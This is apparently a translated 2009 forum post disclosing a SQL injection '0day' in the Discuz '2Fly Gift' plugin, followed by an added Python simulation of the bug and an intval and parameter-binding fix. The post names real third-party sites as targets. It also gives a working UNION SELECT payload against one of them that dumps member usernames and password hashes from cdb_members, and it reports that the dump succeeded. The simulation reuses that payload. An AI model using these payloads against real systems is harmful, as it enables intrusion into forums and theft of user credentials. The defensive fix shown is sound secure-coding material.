Discuz plugin: SQL injection 0day in the account-distribution system

2009-08-14 23:21:02

Plugin: 2Fly Gift (serial number) distribution system
Vulnerable file: 2fly_gift.php (only the latest version is discussed here)
Authors: CN.Tnik & Tojen (the two of us are from the same hometown)

Code analysis:
The injection comes from the gameid parameter, which is used in SQL without any filtering.
1. gameid in the output branch
$query = $db->query("Select * FROM `{$tablepre}2fly_gift` Where `id` = $gameid LIMIT 1");
    $game = $db->fetch_array($query);
Clearly unfiltered, so injection is possible, but there is no column whose value gets displayed, so whatever the injected query returns is never shown on the page; somewhat useless.
http://www.klcwsj.com/2fly_gift.php?action=output&gameid=45
http://bbs.yeswan.com/2fly_gift.php?action=output&gameid=16
After the UNION there is no displayed column, so the data cannot be retrieved.
2. gameid in the Sponsors branch is also unfiltered:
$query = $db->query("Select id,good_names,acc,total,remain,record,expiration FROM `{$tablepre}2fly_gift` Where `id` = $gameid LIMIT 1");
        $game = $db->fetch_array($query);
http://bbs.yeswan.com/2fly_gift. ... ecord&gameid=17
Clearly injectable. I thought it could be exploited, but then a surprise came up (string quotes that the page rendering stripped are restored below):
$recordb = explode('||', $game['record']);
$acc2 = explode(' ', $game['acc']);
$remain = $game['remain'];
$remain2 = $game['remain'] + 1;

/* parse the uids of members who have already claimed */
foreach ($recordb as $recordnow)
{
    $recordc = explode('_', $recordnow);
    $recordd[] = substr($recordc[0], 1);
    $tsbuserID[] = $recordc[0];
    $tsbfafang[] = $recordc[1];
    $randomPW[] = $recordc[2];
    $checkboxTsb[] = $recordc[3];
    if (substr($recordc[0], 1) != '')
    {
        if ($recordc[0])
            $uids .= ',' . substr($recordc[0], 1);
    }
}

$table .= "<form name=form1 method=post action=2fly_gift.php?action=Sponsors&pages=view_record_edit&gameid=" .
    $gameid . ">";

/* read user names */
$uidss = array();
$uidquery = $db->query("Select uid, username FROM {$tablepre}members Where uid IN (" .
    substr($uids, 1) . ") orDER BY uid ASC");
As soon as `and 1=2` is appended, the first query returns no row, so `$game['record']` is empty, `$uids` stays empty, and the second query becomes `uid IN ()`, which is a syntax error. Execution is stuck here and still no data is displayed. I won't go into the other spots; let's see whether the experts have a good way to break through. There are also some UPDATE statements in the file; not sure whether those can be exploited.
The previous version is still exploitable, though. It has a content branch:
http://www.iacct.cn/2fly_gift.php?pages=content&gameid=16 and 1=2 union select 1,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37 from cdb_members
This successfully dumps the username and password (hash) pairs.
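The three branches discussed above, as an added example that is not part of the original post or of the 2Fly plugin: a Python/SQLite simulation of the query shape `WHERE id = $gameid` with gameid pasted in unfiltered. It reproduces the page's three observations in one place: in the content branch the UNION row lands in the displayed column, in the output branch only "did a row come back" is observable, and in the Sponsors branch an `and 1=2` payload empties `$game['record']` so the second query's `uid IN ()` fails (the example raises that error itself, because SQLite, unlike MySQL, accepts an empty IN list). It also shows the hardening the analysis implies: an intval()-style cast plus a bound parameter. The table layout, sample rows, record-string values and the 7-column payload are constructed assumptions; the real table has more columns, and MySQL's concat(username,0x3a,password) is written with SQLite's `||` here.

```python
import re
import sqlite3

# Constructed sample data (assumptions, not from the page): gift row 16 for the
# content/output branches, row 17 with two claim records for the Sponsors
# branch, and three members with placeholder password strings. Record format
# as the plugin parses it: "<prefix char><uid>_<issued>_<randompw>_<checkbox>||..."
GIFT_ROWS = [
    (16, "Gold Card", "A1 A2", 2, 2, "", "2010-01-01"),
    (17, "Silver Card", "B1 B2 B3", 3, 1, "u101_1_pw1_on||u102_1_pw2_on", "2010-01-01"),
]
MEMBERS = [(101, "admin", "hash-of-admin"), (102, "bob", "hash-of-bob"),
           (103, "carol", "hash-of-carol")]

# The UNION must match the target table's column count (37 for the real table
# on the page, 7 here). SQLite concatenates with || where MySQL uses
# concat(username, 0x3a, password).
UNION_PAYLOAD = ("16 and 1=2 union select 1,username||':'||password,3,4,5,6,7 "
                 "from cdb_members")


def setup_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE cdb_2fly_gift (id INTEGER, good_names TEXT, acc TEXT, "
               "total INTEGER, remain INTEGER, record TEXT, expiration TEXT)")
    db.executemany("INSERT INTO cdb_2fly_gift VALUES (?,?,?,?,?,?,?)", GIFT_ROWS)
    db.execute("CREATE TABLE cdb_members (uid INTEGER, username TEXT, password TEXT)")
    db.executemany("INSERT INTO cdb_members VALUES (?,?,?)", MEMBERS)
    return db


def fetch_gift_vulnerable(db, gameid):
    """The query shape shared by all three branches: gameid pasted in unescaped."""
    sql = f"SELECT * FROM cdb_2fly_gift WHERE id = {gameid} LIMIT 1"
    return db.execute(sql).fetchone()


def content_branch(db, gameid):
    """Old-version content branch: renders good_names (column 2) of whatever
    row came back, so a UNION row ends up on screen."""
    row = fetch_gift_vulnerable(db, gameid)
    return row[1] if row else None


def output_branch(db, gameid):
    """Output branch: same injection, but no field of the row is rendered;
    all an attacker can observe is whether a row came back."""
    return fetch_gift_vulnerable(db, gameid) is not None


def parse_record_uids(record):
    """Port of the Sponsors foreach: split on '||', then '_', and keep field 0
    minus its first character (substr($recordc[0], 1))."""
    uids = []
    for entry in record.split("||"):
        first = entry.split("_")[0]
        if first[1:] != "" and first:
            uids.append(first[1:])
    return uids


def sponsors_branch(db, gameid):
    """Sponsors branch: the second query's IN (...) list is built from the
    fetched row's record column; a payload that empties the row empties it."""
    row = fetch_gift_vulnerable(db, gameid)
    record = row[5] if row else ""        # $game['record'] of a false row is ''
    uid_list = ",".join(parse_record_uids(record))
    if not uid_list:
        # MySQL rejects 'IN ()' with a syntax error; SQLite would silently
        # return nothing, so reproduce the MySQL failure the page runs into.
        raise ValueError("MySQL syntax error: empty IN () list")
    sql = f"SELECT uid, username FROM cdb_members WHERE uid IN ({uid_list}) ORDER BY uid ASC"
    return [name for _, name in db.execute(sql).fetchall()]


def sponsors_errors(db, gameid):
    """True when the Sponsors branch dies on the empty IN () list."""
    try:
        sponsors_branch(db, gameid)
        return False
    except ValueError:
        return True


def php_intval(value):
    """Python stand-in for PHP's intval(): leading integer, else 0."""
    m = re.match(r"\s*[+-]?\d+", str(value))
    return int(m.group()) if m else 0


def content_branch_fixed(db, gameid):
    """Hardened form: cast gameid to int (the payload tail is discarded) and
    bind it as a parameter so it can never be parsed as SQL."""
    row = db.execute("SELECT * FROM cdb_2fly_gift WHERE id = ? LIMIT 1",
                     (php_intval(gameid),)).fetchone()
    return row[1] if row else None
```

Run `content_branch(setup_db(), UNION_PAYLOAD)` to see a members row (username:password) come back in place of a gift name, `output_branch(setup_db(), UNION_PAYLOAD)` to see that the same injection yields nothing but True, and `sponsors_errors(setup_db(), "17 and 1=2")` to reproduce the dead end in the Sponsors branch. Either half of the fix on its own would already stop the UNION: the int cast truncates the input to 16, and parameter binding keeps any leftover text out of the SQL grammar.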
